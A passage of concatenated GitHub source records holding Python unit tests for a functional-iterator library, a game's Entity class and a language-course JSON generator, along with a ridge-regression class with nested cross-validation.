test_try_catch(self):\n data = iter(range(10))\n\n def raise_if_over_5(x):\n if x > 5:\n raise ValueError\n return x\n\n piped = F.compose(\n F.map_each(raise_if_over_5),\n F.trycatch(ValueError, catch_yields=\"opps\"),\n )\n\n for x in piped(data):\n print(x)\n\n def test_try_catch_fails_to_catch(self):\n data = iter(range(10))\n\n def raise_if_over_5(x):\n if x > 5:\n raise TypeError\n return x\n\n piped = F.compose(\n F.map_each(raise_if_over_5),\n F.trycatch(ValueError, catch_yields=\"opps\"),\n )\n\n with pytest.raises(TypeError):\n for x in piped(data):\n print(x)\n\n def test_map_all_if(self):\n data = iter(range(10))\n piped = F.compose(\n F.tee_all(),\n F.enumerate_each(),\n F.map_all_if(lambda x: x[0] == 0, lambda x: x[1], lambda x: x[1]),\n F.chain_each(),\n )\n\n result = piped(data)\n print(list(result))\n for r in result:\n print(list(r))\n\n def test_tee_pipe(self):\n data = randint(1, 1000, 100)\n f = F.compose(\n F.tee_pipe(\n F.apply_each(print),\n list,\n )\n )\n result = f(iter(data))\n validate_generator(result, data)\n\n def test_tee_consume(self):\n data = randint(1, 1000, 100)\n f = F.compose(F.tee_consume(F.iter_count(3)))\n result = f(iter(data))\n validate_generator(result, data[3:])\n\n def test_repeat_raises_type_error(self):\n x = \"string\"\n with pytest.raises(TypeError):\n F.repeat_all(x)(iter(randint(1, 10, 10)))\n\n def test_repeat_raises_value_error(self):\n x = -1\n with pytest.raises(ValueError):\n F.repeat_all(x)(iter(randint(1, 10, 10)))\n\n def test_iter_step_raises_type_error(self):\n x = \"string\"\n with pytest.raises(TypeError):\n F.iter_step(x)(iter(randint(1, 10, 10)))\n\n def test_iter_step_raises_value_error(self):\n x = -1\n with pytest.raises(ValueError):\n F.iter_step(x)(iter(randint(1, 10, 10)))\n\n def test_tee_pipe_yield(self):\n\n data = range(20)\n\n f = F.compose(\n F.tee_pipe_yield(F.filter_each(lambda x: x < 2)),\n F.iter_reverse(),\n F.chain_each(),\n )\n\n assert list(f(data)) == list(range(20)) + [0, 1]\n","repo_name":"jvrana/caldera","sub_path":"tests/test_utils/test_functional/test_functional_iterators.py","file_name":"test_functional_iterators.py","file_ext":"py","file_size_in_byte":14992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"12525081733","text":"import numpy\nimport pandas\nfrom joblib import delayed, Parallel\n\nfrom sklearn import preprocessing\nfrom sklearn.base import BaseEstimator\nfrom sklearn.decomposition import PCA\nfrom sklearn.metrics import mean_squared_error, r2_score\nfrom sklearn.model_selection import KFold, GridSearchCV, cross_val_score, train_test_split, learning_curve, cross_validate, ParameterGrid, ParameterSampler\nfrom sklearn.utils import check_X_y, check_array\nfrom sklearn.utils.validation import check_is_fitted\n\nfrom dataTypes import ElaborationResult\n\n\nclass BaseRidgeRegression(BaseEstimator):\n nested_cross_validation_trials = 10\n\n def __init__(self, alpha: float = 1.0):\n self.alpha = alpha\n self.R2 = []\n self.MSE = []\n\n def nestedCrossValidation(self, X: pandas.DataFrame, y: pandas.Series):\n EX_CV = KFold(n_splits=self.nested_cross_validation_trials, shuffle=True, random_state=1986)\n IN_CV = KFold(n_splits=5, shuffle=True)\n\n outer_scores = []\n variance = []\n best_inner_list = []\n best_inner_alpha = 0\n\n for (i, (EX_train_idx, EX_test_idx)) in enumerate(EX_CV.split(X, y)):\n EX_x_train, EX_x_test = X.iloc[EX_train_idx], X.iloc[EX_test_idx]\n EX_y_train, EX_y_test = y.iloc[EX_train_idx], y.iloc[EX_test_idx]\n\n for (j, (IN_train_idx, IN_test_idx)) in enumerate(IN_CV.split(EX_x_train, EX_y_train)):\n def _fit(x_train: pandas.DataFrame, x_test: pandas.DataFrame, y_train: pandas.Series, y_test: pandas.Series, ɑ: float):\n self.alpha = ɑ\n self.fit(x_train, y_train)\n inner_grid_score = self.score(x_test, y_test)\n return inner_grid_score, ɑ\n\n IN_x_train, IN_x_test = EX_x_train.iloc[IN_train_idx], EX_x_train.iloc[IN_test_idx]\n IN_y_train, IN_y_test = EX_y_train.iloc[IN_train_idx], EX_y_train.iloc[IN_test_idx]\n\n IN_result = Parallel(n_jobs=-1)(delayed(_fit)(IN_x_train, IN_x_test, IN_y_train, IN_y_test, ɑ)\n for ɑ in self.alphas)\n\n IN_result = numpy.array(IN_result)\n best_idx = numpy.argmax(IN_result[:, 0])\n best_inner_alpha = IN_result[best_idx][1]\n best_inner_list.append(IN_result[best_idx])\n\n self.alpha = best_inner_alpha\n self.fit(EX_x_train, EX_y_train)\n\n score, pred = self.score_and_prediction(EX_x_test, EX_y_test)\n outer_scores.append(score)\n variance.append(numpy.var(pred))\n\n best_inner_list = numpy.array(best_inner_list)\n best_idx = numpy.argmax(best_inner_list[:, 0])\n best_alpha = best_inner_list[best_idx][1]\n\n self.best_alpha = best_alpha\n\n return numpy.array(variance), numpy.array(outer_scores), best_alpha\n\n def nestedCrossValidationKFold(self, X, y) -> None:\n p_grid = {\"alpha\": self.alphas}\n\n self.best_alphas_NestedCV = []\n self.best_alphas_NonNestedCV = []\n\n self.non_nested_scores = numpy.zeros(self.nested_cross_validation_trials)\n self.nested_scores = numpy.zeros(self.nested_cross_validation_trials)\n\n for i in range(self.nested_cross_validation_trials):\n inner_cv = KFold(n_splits=5, shuffle=True)\n outer_cv = KFold(n_splits=5, shuffle=True, random_state=1986)\n\n clf = GridSearchCV(estimator=self, param_grid=p_grid, cv=inner_cv, n_jobs=-1)\n clf.fit(X, y)\n\n self.non_nested_scores[i] = clf.best_score_\n self.best_alphas_NonNestedCV.append((clf.best_params_['alpha'], clf.best_score_))\n\n scores = cross_validate(clf, X=X, y=y, cv=outer_cv, return_estimator=True, n_jobs=-1)\n test_score = scores['test_score']\n j = numpy.argmax(test_score)\n self.best_alphas_NestedCV.append((scores['estimator'][j].best_params_['alpha'], test_score[j]))\n\n self.nested_scores[i] = test_score.mean()\n\n self.score_difference = self.non_nested_scores - self.nested_scores\n\n self.best_alphas_NestedCV = numpy.array(self.best_alphas_NestedCV)\n self.best_alphas_NonNestedCV = numpy.array(self.best_alphas_NonNestedCV)\n\n j = numpy.argmax(self.best_alphas_NestedCV[:, 1])\n self.best_alpha_NestedCV = self.best_alphas_NestedCV[j, 0]\n\n j = numpy.argmax(self.best_alphas_NonNestedCV[:, 1])\n self.best_alpha_NonNestedCV = self.best_alphas_NonNestedCV[j, 0]\n\n def crossValidationKFold(self, X: pandas.DataFrame, y: pandas.Series) -> None:\n self.R2.clear()\n self.MSE.clear()\n\n kf = KFold(n_splits=5, shuffle=True, random_state=1986)\n\n for ɑ in self.alphas:\n k_scores = []\n k_mses = []\n\n self.alpha = ɑ\n\n for train_index, test_index in kf.split(X):\n x_train, x_test = X.iloc[train_index], X.iloc[test_index]\n y_train, y_test = y.iloc[train_index], y.iloc[test_index]\n\n self.fit(x_train, y_train)\n\n y_pred = self.predict(x_test)\n\n score = r2_score(y_test, y_pred)\n mse = mean_squared_error(y_test, y_pred)\n\n k_scores.append(score)\n k_mses.append(mse)\n\n self.R2.append(numpy.mean(k_scores))\n self.MSE.append(numpy.mean(k_mses))\n\n def printBestScores(self) -> None:\n print(self.algo + ':')\n print(f'-best ɑ: {self.best_alpha}')\n print(f'-best MSE: {self.best_MSE}')\n print(f'-best R²: {self.best_R2}')\n\n def calculateScoring(self, alphas, x_train: pandas.DataFrame, y_train: pandas.Series, x_test: pandas.DataFrame, y_test: pandas.Series) -> None:\n self.MSE.clear()\n self.R2.clear()\n self.alphas = alphas\n\n for ɑ in self.alphas:\n self.alpha = ɑ\n self.fit(x_train, y_train)\n y_predict = self.predict(x_test)\n\n self.MSE.append(mean_squared_error(y_test, y_predict))\n self.R2.append(r2_score(y_test, y_predict))\n\n idx_best_r2 = numpy.argmax(self.R2)\n idx_best_mse = numpy.argmin(self.MSE)\n\n self.best_MSE = self.MSE[idx_best_mse]\n self.best_R2 = self.R2[idx_best_r2]\n\n self.best_alpha = self.alphas[idx_best_r2]\n self.alpha = self.best_alpha\n\n def trainBySize(self, sizes, X, y) -> numpy.ndarray:\n coef_list = []\n\n for s in sizes:\n X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=s, shuffle=True, random_state=1986)\n self.fit(X_train, y_train)\n coef_list.append(self.coef_)\n\n return numpy.array(coef_list)\n\n def fitPCA(self, n_components: int, X: numpy.ndarray):\n pca = PCA(n_components=n_components)\n pca.fit(X)\n coef_pca = pca.transform(X)\n self.pca_singular_values = pca.singular_values_\n\n return coef_pca\n\n def learningCurvePCA(self, sizes, n_components: int, X: numpy.ndarray, y: numpy.ndarray, scoring):\n X_pca = self.fitPCA(n_components, X)\n return learning_curve(self, X_pca, y, train_sizes=sizes, cv=5, scoring=scoring, n_jobs=-1)\n\n def fitPCABySize(self, sizes, X, y, n_components: int):\n coef_matrix = self.trainBySize(sizes, X, y)\n coef_pca = self.fitPCA(n_components, coef_matrix)\n\n return coef_pca\n\n def executeAll(self, S: pandas.DataFrame, y: pandas.Series, x_test: pandas.DataFrame, y_test: pandas.Series) -> ElaborationResult:\n S_ = S.to_numpy()\n y_ = y.to_numpy()\n x_test_ = x_test.to_numpy()\n y_test_ = y_test.to_numpy()\n\n self.fit(S_, y_)\n R = ElaborationResult(self.coef_, self.predict(x_test_))\n\n R.mape = mean_squared_error(y_test_, R.y_predict)\n R.r2 = r2_score(y_test_, R.y_predict)\n\n return R\n\n def score_and_prediction(self, x_test: pandas.DataFrame, y_test: pandas.Series):\n y_predict = self.predict(x_test)\n score = r2_score(y_test, y_predict)\n\n return score, y_predict\n\n def score(self, x_test: pandas.DataFrame, y_test: pandas.Series) -> numpy.float64:\n score, y_predict = self.score_and_prediction(x_test, y_test)\n\n return score\n\n def fit(self, X, y):\n \"\"\"A reference implementation of a fitting function.\n Parameters\n ----------\n X : {array-like, sparse matrix}, shape (n_samples, n_features)\n The training input samples.\n y : array-like, shape (n_samples,) or (n_samples, n_outputs)\n The target values (class labels in classification, real numbers in\n regression).\n Returns\n -------\n self : object\n Returns self.\n \"\"\"\n X, y = check_X_y(X, y, accept_sparse=True)\n self.is_fitted_ = True\n\n y = y.reshape(-1, 1)\n\n # Compute the weighted arithmetic mean along the specified axis.\n S_wam = numpy.average(X, axis=0)\n y_wam = numpy.average(y, axis=0)\n\n S = X - S_wam\n y = y - y_wam\n\n # Normalization is the process of scaling individual samples to have unit norm.\n # This process can be useful if you plan to use a quadratic form such as the dot-product or any other kernel to quantify the similarity of any pair of samples.\n # This assumption is the base of the Vector Space Model often used in text classification and clustering contexts.\n # The function normalize provides a quick and easy way to perform this operation on a single array-like dataset, either using the l1 or l2 norms.\n S, norm_L2 = preprocessing.normalize(X=S, norm=\"l2\", axis=0, copy=False, return_norm=True)\n\n self.coef_ = self.calculateWeights(S, y) / norm_L2\n self.intercetta = y_wam - S_wam @ self.coef_.T\n\n # `fit` should always return `self`\n return self\n\n def predict(self, X):\n \"\"\" A reference implementation of a predicting function.\n Parameters\n ----------\n X : {array-like, sparse matrix}, shape (n_samples, n_features)\n The training input samples.\n Returns\n -------\n y : ndarray, shape (n_samples,)\n Returns an array of ones.\n \"\"\"\n X = check_array(X, accept_sparse=True)\n check_is_fitted(self, 'is_fitted_')\n\n y_predict = X @ self.coef_.T + self.intercetta\n\n return y_predict\n\n # abstract\n def calculateWeights(self, S: numpy.ndarray, y: numpy.ndarray) -> numpy.ndarray:\n raise NotImplementedError(\"Please Implement this method\")\n","repo_name":"mikymaione/HousingPrices","sub_path":"SourceCode/HousingPrices/baseRidgeRegression.py","file_name":"baseRidgeRegression.py","file_ext":"py","file_size_in_byte":10584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71724946640","text":"from entity import Entity\nfrom weapon import Weapon\nimport unittest\n\n\nclass TestEntity(unittest.TestCase):\n\n def test_Entity_init(self):\n my_Entity = Entity(\"Ivan\", 100)\n self.assertEqual(my_Entity.name, \"Ivan\")\n self.assertEqual(my_Entity.health, 100)\n\n def test_hero_get_health(self):\n my_Entity = Entity(\"Ivan\", 100)\n self.assertEqual(my_Entity.get_health(), 100)\n\n def test_Entity_is_alive(self):\n my_Entity = Entity(\"Ivan\", 100)\n self.assertTrue(my_Entity.is_alive())\n\n def test_Entity_is_alive_dead(self):\n my_Entity = Entity(\"Ivan\", 100)\n my_Entity.health = 0\n self.assertFalse(my_Entity.is_alive())\n\n def test_Entity_take_damage(self):\n my_Entity = Entity(\"Ivan\", 100)\n my_Entity.take_damage(50)\n self.assertEqual(my_Entity.get_health(), 50)\n\n def test_Entity_take_damage_float(self):\n my_Entity = Entity(\"Ivan\", 100)\n my_Entity.take_damage(50.5)\n self.assertEqual(my_Entity.get_health(), 49.5)\n\n def test_Entity_take_healing(self):\n my_Entity = Entity(\"Ivan\", 100)\n my_Entity.health = 50\n my_Entity.take_healing(30)\n self.assertEqual(my_Entity.get_health(), 80)\n\n def test_Entity_take_healing_dead(self):\n my_Entity = Entity(\"Ivan\", 100)\n my_Entity.health = 0\n self.assertFalse(my_Entity.take_healing(30))\n self.assertEqual(my_Entity.get_health(), 0)\n\n def test_Entity_take_healing_maxhealing(self):\n my_Entity = Entity(\"Ivan\", 100)\n my_Entity.health = 100\n my_Entity.take_healing(10)\n self.assertEqual(my_Entity.get_health(), 100)\n\n def test_Entity_equip_weapon_no_weapon(self):\n my_weapon = Weapon(\"Axe\", 31, 0.2)\n my_Entity = Entity(\"Ivan\", 100)\n my_Entity.equip_weapon(my_weapon)\n self.assertEqual(my_Entity.weapon.type, \"Axe\")\n self.assertEqual(my_Entity.weapon.damage, 31)\n self.assertEqual(my_Entity.weapon.critical_strike_percent, 0.2)\n\n def test_Entity_has_weapon(self):\n my_weapon = Weapon(\"Axe\", 31, 0.2)\n my_Entity = Entity(\"Ivan\", 100)\n my_Entity.equip_weapon(my_weapon)\n self.assertTrue(my_Entity.has_weapon())\n\n def test_Entity_equip_weapon_with_weapon(self):\n my_weapon = Weapon(\"Axe\", 31, 0.2)\n my_weapon2 = Weapon(\"Sword\", 20, 0.5)\n my_Entity = Entity(\"Ivan\", 100)\n my_Entity.equip_weapon(my_weapon)\n my_Entity.equip_weapon(my_weapon2)\n self.assertEqual(my_Entity.weapon.type, \"Sword\")\n self.assertEqual(my_Entity.weapon.damage, 20)\n self.assertEqual(my_Entity.weapon.critical_strike_percent, 0.5)\n\n def test_Entity_attack_with_weapon(self):\n my_weapon = Weapon(\"Axe\", 31, 0.2)\n my_Entity = Entity(\"Ivan\", 100)\n my_Entity.equip_weapon(my_weapon)\n attack = my_weapon.damage * (1 + my_weapon.critical_strike_percent)\n true_attack = my_Entity.attack()\n self.assertEqual(attack, true_attack)\n\n def test_Entity_attack_no_weapon(self):\n my_Entity = Entity(\"Ivan\", 100)\n attack = 0\n true_attack = my_Entity.attack()\n self.assertEqual(attack, true_attack)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Hristiyan-Andreev/HackBuglaria","sub_path":"Week2/Dungeons and Pythons/entityTest.py","file_name":"entityTest.py","file_ext":"py","file_size_in_byte":3257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3781220665","text":"from unittest.mock import patch\nfrom unittest import TestCase\nfrom liblili2json import get_course_data\nfrom liblili2json import get_skill_data\nfrom liblili2json import get_challenges_data\nfrom liblili2json import calculate_number_of_levels\nfrom liblili2json import get_word_challenges\nfrom liblili2json import get_phrase_challenges\nfrom liblili2json import get_cards_challenge\nfrom liblili2json import get_short_input_challenge\nfrom liblili2json import get_listening_challenge\nfrom liblili2json import get_chips_challenge\nfrom liblili2json import get_options_challenge\nfrom liblili2json import get_chips\nfrom liblili2json import get_dumb_opaque_id\nfrom liblili2json import clean_word\nfrom liblili2json import define_words_in_sentence\nfrom liblili2json import define_word\nfrom liblili2json.types import Phrase\nfrom liblili2json.types import Course\nfrom liblili2json.types import Word\nfrom liblili2json.types import DictionaryItem\nfrom . import fakes\n\n\ndef test_get_course_data_return_value():\n \"\"\"\n Tests the return value of get_course_data with the\n fakes.course1 object\n \"\"\"\n assert get_course_data(fakes.course1) == {\n \"languageName\": \"my language\",\n \"languageCode\": \"de\",\n \"specialCharacters\": [\"ä\", \"ß\"],\n \"license\": {\n \"name\": {\n \"short\": \"foo\",\n \"full\": \"foo bar license\",\n },\n \"link\": None,\n },\n \"modules\": [\n {\n \"title\": \"Basics\",\n \"skills\": [\n {\n \"title\": \"Masculine\",\n \"practiceHref\": \"masculine\",\n \"summary\": [\"lorem ipsum\"],\n \"imageSet\": [\"man1\", \"man2\", \"boy1\"],\n 'id': 'd7279e4777cd',\n \"levels\": 1,\n },\n {\n \"title\": \"Feminine\",\n \"practiceHref\": \"feminine\",\n \"imageSet\": [\"woman1\", \"woman2\", \"girl1\"],\n \"summary\": [\"foous\", \"apfel\", \"foous\", \"apfel\", \"foous barus\"],\n 'id': 'd7279e4777cd',\n \"levels\": 2,\n },\n {\n \"title\": \"Neuter\",\n \"summary\": [],\n \"practiceHref\": \"neuter\",\n \"imageSet\": [\"foo1\", \"bar1\", \"bar2\"],\n 'id': 'd7279e4777cd',\n \"levels\": 1,\n },\n ]\n },\n {\n \"title\": \"Phrases\",\n \"skills\": []\n }\n ]\n }\n\n\ndef test_get_course_data_return_value_2():\n \"\"\"\n Tests the return value of get_course_data with the\n fakes.course2 object\n \"\"\"\n assert get_course_data(fakes.course2) == {\n \"languageName\": \"another language\",\n \"languageCode\": \"tr\",\n \"specialCharacters\": [\"ç\", \"ş\"],\n \"license\": {\n \"name\": {\n \"short\": \"lorem\",\n \"full\": \"ipsum lorem license\"\n },\n \"link\": \"https://example.com/lipsum_license\",\n },\n \"modules\": [\n {\n \"title\": \"Animals\",\n \"skills\": [\n {\n 'id': 'd7279e4777cd',\n \"title\": \"Mammals and birds\",\n \"practiceHref\": \"mammals-and-birds\",\n \"summary\": [\"foous\"],\n \"levels\": 1,\n }\n ]\n },\n ]\n }\n\n\ndef test_calculate_number_of_levels():\n examples = [\n {\"words\": 0, \"phrases\": 0, \"result\": 1},\n {\"words\": 10, \"phrases\": 0, \"result\": 2},\n {\"words\": 0, \"phrases\": 10, \"result\": 3},\n {\"words\": 10, \"phrases\": 10, \"result\": 4},\n ]\n\n for example in examples:\n assert calculate_number_of_levels(\n example[\"words\"], example[\"phrases\"]) == example[\"result\"]\n\n\nclass TestGetSkillData(TestCase):\n def test_empty_skill(self):\n assert get_skill_data(fakes.emptySkill, fakes.courseEmpty) == {\n \"id\": \"d7279e4777cd\",\n \"levels\": 1,\n \"challenges\": []\n }\n\n @patch('liblili2json.calculate_number_of_levels')\n def test_correct_number_of_levels(self, mock):\n FAKE_NUMBER = \"fake number\"\n mock.return_value = FAKE_NUMBER\n converted_skill = get_skill_data(fakes.emptySkill, fakes.course1)\n assert converted_skill[\"levels\"] == FAKE_NUMBER\n\n @patch('liblili2json.calculate_number_of_levels')\n def test_calculates_levels_correctly(self, mock):\n get_skill_data(fakes.skills[1], fakes.course1)\n mock.assert_called_with(4, 1)\n\n @patch('liblili2json.get_challenges_data')\n def test_correct_challenges(self, mock):\n FAKE_CHALLENGES = \"fake challenges\"\n mock.return_value = FAKE_CHALLENGES\n converted_skill = get_skill_data(fakes.skills[1], fakes.course1)\n assert converted_skill[\"challenges\"] == FAKE_CHALLENGES\n\n @patch('liblili2json.get_challenges_data')\n def test_formats_challenges_correctly(self, mock):\n get_skill_data(fakes.skills[1], fakes.course1)\n mock.assert_called_with(fakes.skills[1], fakes.course1)\n\n\nclass TestGetChallengesData(TestCase):\n def test_empty_skill(self):\n assert get_challenges_data(fakes.emptySkill, fakes.course1) == []\n\n @patch('liblili2json.get_phrase_challenges')\n def test_generates_phrase_challenges_correctly(self, mock):\n get_challenges_data(fakes.skillWithPhrase, fakes.course1)\n mock.assert_called_with(fakes.phrase2, fakes.course1)\n\n @patch('liblili2json.get_phrase_challenges')\n def test_includes_every_phrase(self, mock):\n get_challenges_data(fakes.skillWith3Phrases, fakes.course1)\n assert mock.call_count == 3\n\n @patch('liblili2json.get_word_challenges')\n def test_generates_word_challenges_correctly(self, mock):\n get_challenges_data(fakes.skillWithWord, fakes.course1)\n mock.assert_called_with(fakes.word1, fakes.course1)\n\n @patch('liblili2json.get_word_challenges')\n def test_includes_every_word(self, mock):\n get_challenges_data(fakes.skillWith3Words, fakes.course1)\n assert mock.call_count == 3\n\n @patch('liblili2json.get_word_challenges')\n @patch('liblili2json.get_phrase_challenges')\n def test_returns_correct_challenges(self, mock1, mock2):\n\n mock1.return_value = [fakes.challenge1, fakes.challenge2]\n mock2.return_value = [fakes.challenge3, fakes.challenge4]\n assert get_challenges_data(fakes.skillWithPhraseAndWord, fakes.course1) == [\n fakes.challenge1, fakes.challenge2, fakes.challenge3, fakes.challenge4]\n\n\nclass TestGetWordChallenges(TestCase):\n @patch('liblili2json.challenge_types.get_cards_challenge')\n def test_includes_cards_challenges(self, mock):\n fake_value = fakes.fake_value()\n mock.return_value = fake_value\n assert get_word_challenges(fakes.word1, fakes.course1)[0] == fake_value\n\n @patch('liblili2json.challenge_types.get_short_input_challenge')\n def test_includes_short_input_challenges(self, mock):\n fake_value = fakes.fake_value()\n mock.return_value = fake_value\n assert get_word_challenges(fakes.word1, fakes.course1)[1] == fake_value\n\n @patch('liblili2json.challenge_types.get_listening_challenge')\n def test_includes_listening_challenge(self, mock):\n fake_value = fakes.fake_value()\n mock.return_value = fake_value\n assert get_word_challenges(fakes.word1, fakes.course1)[2] == fake_value\n\n\nclass TestGetPhraseChallenges(TestCase):\n @patch('liblili2json.challenge_types.get_options_challenge')\n def test_includes_options_challenges(self, mock):\n fake_value = fakes.fake_value()\n mock.return_value = fake_value\n assert get_phrase_challenges(\n fakes.phrase1, fakes.course1)[0] == fake_value\n\n @ patch('liblili2json.challenge_types.get_listening_challenge')\n def test_includes_listening_challenge(self, mock):\n fake_value = fakes.fake_value()\n mock.return_value = fake_value\n assert get_phrase_challenges(\n fakes.phrase1, fakes.course1)[1] == fake_value\n\n @ patch('liblili2json.challenge_types.get_chips_challenge')\n def test_includes_chips_challenge(self, mock):\n fake_value = fakes.fake_value()\n mock.return_value = fake_value\n assert get_phrase_challenges(\n fakes.long_phrase, fakes.course1)[2] == fake_value\n\n @ patch('liblili2json.challenge_types.get_reverse_chips_challenge')\n def test_includes_reverse_chips_challenge(self, mock):\n fake_value = fakes.fake_value()\n mock.return_value = fake_value\n assert get_phrase_challenges(\n fakes.long_phrase, fakes.course1)[3] == fake_value\n\n def test_returns_correct_number_of_challenged(self):\n assert len(get_phrase_challenges(\n fakes.long_phrase, fakes.course1)) == 4\n\n def test_doesnt_include_chips_if_sentence_is_short(self):\n assert len(list(filter(\n lambda x: x[\"type\"] == \"chips\", get_phrase_challenges(\n fakes.customize(\n fakes.phrase1,\n in_target_language=[\"foo\"],\n in_source_language=[\"bar\"],\n ), fakes.course1)))) == 0\n\n\nclass TestGetCardsChallenge(TestCase):\n def test_returns_correct_value1(self):\n challenge = get_cards_challenge(fakes.word1, fakes.course1)\n assert challenge == {\n 'id': '95e24ac99aa9',\n \"type\": \"cards\",\n \"formInTargetLanguage\": \"foous\",\n \"meaningInSourceLanguage\": \"foo\",\n \"priority\": 0,\n 'group': 'aab69500f014',\n 'pictures': ['foo', 'bar', 'baz']\n }\n\n def test_returns_correct_value2(self):\n challenge = get_cards_challenge(fakes.word2, fakes.course1)\n assert challenge == {\n 'id': '22bd7b11c2c9',\n \"type\": \"cards\",\n \"formInTargetLanguage\": \"apfel\",\n \"meaningInSourceLanguage\": \"apple\",\n \"priority\": 0,\n 'group': '9dbe235cb2d6',\n 'pictures': ['1', '2', '3']\n }\n\n\nclass TestGetOptionsChallenge(TestCase):\n def test_returns_correct_value1(self):\n challenge = get_options_challenge(fakes.word1, fakes.course1)\n assert challenge == {\n 'id': 'db8fd4cec19f',\n \"type\": \"options\",\n \"formInTargetLanguage\": \"foous\",\n \"meaningInSourceLanguage\": \"foo\",\n \"priority\": 0,\n 'group': 'aab69500f014',\n }\n\n def test_returns_correct_value2(self):\n challenge = get_options_challenge(fakes.word2, fakes.course1)\n assert challenge == {\n 'id': 'e50475a646e2',\n \"type\": \"options\",\n \"formInTargetLanguage\": \"apfel\",\n \"meaningInSourceLanguage\": \"apple\",\n \"priority\": 0,\n 'group': '9dbe235cb2d6',\n }\n\n\nclass TestGetShortInputChallenge(TestCase):\n def test_returns_correct_value1(self):\n challenge = get_short_input_challenge(fakes.word1, fakes.course1)\n assert challenge == {\n 'id': '749e7c734898',\n \"type\": \"shortInput\",\n 'pictures': ['foo', 'bar', 'baz'],\n \"formInTargetLanguage\": [\"foous\"],\n 'phrase': [{'word': 'foo'}],\n \"priority\": 1,\n 'group': 'aab69500f014',\n }\n\n def test_returns_correct_value2(self):\n challenge = get_short_input_challenge(fakes.word2, fakes.course1)\n assert challenge == {\n 'id': '5f1b4778039c',\n \"type\": \"shortInput\",\n 'pictures': ['1', '2', '3'],\n \"formInTargetLanguage\": [\"apfel\"],\n 'phrase': [{'word': 'apple'}],\n \"priority\": 1,\n 'group': '9dbe235cb2d6',\n }\n\n\nclass TestListeningChallenge(TestCase):\n def test_returns_correct_value1(self):\n challenge = get_listening_challenge(fakes.word1, fakes.course1)\n assert challenge == {\n 'id': 'ae89bd25c323',\n \"type\": \"listeningExercise\",\n \"answer\": \"foous\",\n \"meaning\": \"foo\",\n \"priority\": 1,\n 'group': 'aab69500f014',\n 'audio': '3f981d854531e9f376ae06cb8449a6e997972d3c1b598f9a00b481ef307a469d'\n }\n\n def test_returns_correct_value2(self):\n challenge = get_listening_challenge(fakes.word2, fakes.course1)\n assert challenge == {\n 'id': '7de4d5b7f106',\n \"type\": \"listeningExercise\",\n \"answer\": \"apfel\",\n \"meaning\": \"apple\",\n \"priority\": 1,\n 'group': '9dbe235cb2d6',\n 'audio': 'f38b5ac2a5e36c336eed306d56ed517bfd78a728321be0b87db5def8ff8abc3d'\n }\n\n\nclass TestChipsChallenge(TestCase):\n def test_returns_correct_value1(self):\n challenge = get_chips_challenge(fakes.phrase1, fakes.course1)\n assert challenge == {\n \"type\": \"chips\",\n \"translatesToSourceLanguage\": False,\n \"phrase\": [\n {\"word\": \"foo\"},\n {\"word\": \"bar\"},\n ],\n 'id': '9f9b09771a07',\n 'group': '930c4c4e7552',\n \"priority\": 2,\n \"chips\": [\"foous\", \"barus\"],\n \"solutions\": [[\"foous\", \"barus\"]],\n \"formattedSolution\": \"foous barus\",\n }\n\n @patch('liblili2json.challenge_types.get_chips')\n def test_returns_correct_value2(self, get_chips):\n get_chips.return_value = fakes.fake_value()\n challenge = get_chips_challenge(\n fakes.phrase_with_alternatives, fakes.course1)\n assert challenge == {\n \"type\": \"chips\",\n \"translatesToSourceLanguage\": False,\n \"phrase\": [\n {\"word\": \"foo\"},\n {\"word\": \"bar\"},\n {\"word\": \"foo\"},\n {\"word\": \"bar\"},\n ],\n 'id': '4b0e9208ce1b',\n 'group': '66a39e74a2c8',\n \"priority\": 2,\n \"solutions\": [get_chips.return_value, get_chips.return_value],\n \"chips\": get_chips.return_value,\n \"formattedSolution\": \"foous barus foous barus \",\n }\n\n @patch('liblili2json.challenge_types.get_chips')\n def test_calls_get_chips_with_correct_value(self, get_chips):\n fake_phrase = Phrase(\n in_target_language=[fakes.fake_value()],\n in_source_language=[\"\"]\n )\n get_chips_challenge(fake_phrase, fakes.course1)\n get_chips.assert_called_with(fake_phrase.in_target_language[0])\n\n\nclass GetChipsTest(TestCase):\n def test_empty_string(self):\n assert get_chips('') == []\n\n @patch('liblili2json.challenge_types.clean_word')\n def test_empty_string_doesnt_call_clean_word(self, clean_word):\n get_chips('')\n assert not clean_word.called\n\n @patch('liblili2json.challenge_types.clean_word')\n def test_calls_clean_word_with_correct_argument(self, clean_word):\n get_chips('foo')\n clean_word.assert_called_with('foo')\n\n @patch('liblili2json.challenge_types.clean_word')\n def test_returns_correct_value(self, clean_word):\n clean_word.return_value = fakes.fake_value()\n assert get_chips('foo') == [clean_word.return_value]\n\n @patch('liblili2json.challenge_types.clean_word')\n def test_returns_correct_number_of_words(self, clean_word):\n assert len(get_chips('foo bar')) == 2\n\n\nclass CleanWordTest(TestCase):\n def test_empty_string(self):\n assert clean_word(\"\") == \"\"\n\n def test_removes_parentheses(self):\n assert clean_word(\"(foo\") == \"foo\"\n\n def test_removes_comma(self):\n assert clean_word(\"foo,\") == \"foo\"\n\n def test_doesnt_remove_parts_of_word(self):\n assert clean_word(\"ba-ar\") == \"ba-ar\"\n\n def test_doesnt_remove_parts_of_word(self):\n assert clean_word(\"L'Hospitalet\") == \"L'Hospitalet\"\n\n def test_removes_exclamation_mark(self):\n assert clean_word(\"ba-ar!\") == \"ba-ar\"\n\n def test_weird_english_posessive(self):\n assert clean_word(\"cats'\") == \"cats'\"\n\n\nclass DefineWordsInSentenceTest(TestCase):\n def test_empty_sentence(self):\n assert define_words_in_sentence(fakes.course1, \"\", False) == []\n\n @patch('liblili2json.dictionary.define_word')\n def test_calls_define_word_the_correct_number_of_times(self, define_word):\n define_words_in_sentence(fakes.course1, \"foo bar baz\", False) == []\n assert define_word.call_count == 3\n\n @patch('liblili2json.dictionary.define_word')\n def test_calls_define_word_with_the_correct_data(self, define_word):\n reverse = fakes.fake_value()\n fake_word = str(fakes.fake_value())\n define_words_in_sentence(\n fakes.course1, fake_word, reverse) == []\n define_word.assert_called_with(fakes.course1, fake_word, reverse)\n\n @patch('liblili2json.dictionary.define_word')\n def test_returns_correct_value(self, define_word):\n define_word.return_value = fakes.fake_value()\n assert define_words_in_sentence(\n fakes.course1, \"foo\", True) == [define_word.return_value]\n\n @ 